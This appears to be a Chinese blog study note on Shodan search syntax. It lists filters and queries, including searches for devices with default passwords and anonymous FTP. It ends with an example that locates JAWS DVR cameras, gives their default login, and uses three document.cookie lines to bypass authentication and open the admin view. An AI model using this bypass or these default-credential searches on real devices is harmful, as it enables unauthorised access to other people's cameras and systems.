【笔记】Shodan撒旦搜索语法

发表于 更新于 阅读次数:

前言

Shodan撒旦搜索语法学习笔记

Shodan所有产品
Shodan热门搜索关键字

Shodan Search 关键字

传送门

通过IP搜索

  • <ip>

通过域名搜索

  • <domain>

通过协议搜索

HTTP协议

  • http

Telnet协议

  • telnet
可能存在默认密码
  • telnet default password

SSH协议

  • ssh
可能存在默认密码
  • telnet default password

FTP协议

可能开放匿名访问
  • FTP anon successful

通过网络设备搜索

Cisco Devices

  • cisco-ios last-modified
  • 200 OK product:"Cisco IOS http config"
  • 200 OK cisco

EDIMAX路由器

  • edimax
可能存在默认密码
  • edimax default password

Shodan Search 过滤词

指定国家

  • country:""
    • 中国:country:"cn"
    • 美国:country:"us"
    • 日本:country:"jp"

指定产品

  • product:""
    • 微软IIS:product:"Microsoft IIS httpd"
    • Nginx:product:"nginx"
    • Apache:product:"Apache httpd"
    • MySQL:product:"MySQL"

指定版本

  • version:""

指定域名

  • hostname:""
    • hostname:".com"

指定操作系统

  • os:""
    • os:"Windows Server 2008 R2"
    • os:"Windows 7 or 8"
    • os:"Linux 2.6.x"

指定网段

  • net:""

指定端口

  • port:""

Exploits

传送门

  • 根据漏洞编号搜索可能存在漏洞的地址

  • 漏洞编号

Shodan Monitor

  • 需要付费

  • 持续展现可能开放的端口、可能存在漏洞的端口、漏洞编号

案例

搜索JAWS摄像头

  • JAWS/1.1

Username:admin
Password:空

通过Cookie绕过认证

1
2
3
document.cookie="dvr_camcnt=4";
document.cookie="dvr_usr=admin";
document.cookie="dvr_pwd=123";

直接访问后台/view2.html

完成

参考文献

哔哩哔哩——拼客学院陈鑫杰